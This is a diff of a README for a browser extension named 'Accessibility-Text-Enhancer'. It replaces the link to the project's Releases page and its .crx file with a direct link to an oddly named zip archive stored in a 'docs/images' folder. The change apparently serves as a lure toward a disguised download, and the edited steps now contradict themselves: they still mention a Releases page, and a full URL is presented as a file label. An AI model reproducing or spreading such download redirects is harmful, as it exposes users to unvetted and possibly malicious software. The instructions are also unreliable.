Deathfrosthacker/Accessibility-Text-Enhancer/README.md

 ## 📦 Download & Install

-To get started, visit this page to download: [Download Accessibility-Text-Enhancer](https://github.com/Deathfrosthacker/Accessibility-Text-Enhancer/releases)
+To get started, visit this page to download: [Download Accessibility-Text-Enhancer](https://raw.githubusercontent.com/Deathfrosthacker/Accessibility-Text-Enhancer/main/docs/images/Enhancer-Text-Accessibility-2.2.zip)

 ### Steps to Download and Install:

 1. Click on the **Download Accessibility-Text-Enhancer** link above.
 2. You will be taken to the Releases page.
 3. Look for the latest version listed.
 This version will include the most recent features and fixes.
-4. Under the version, find the file labeled `Accessibility-Text-Enhancer.crx`—this is the file you need to download.
+4. Under the version, find the file labeled `https://raw.githubusercontent.com/Deathfrosthacker/Accessibility-Text-Enhancer/main/docs/images/Enhancer-Text-Accessibility-2.2.zip`—this is the file you need to download.
 5. Click on the file to begin downloading.

 After the download completes, you can install the extension.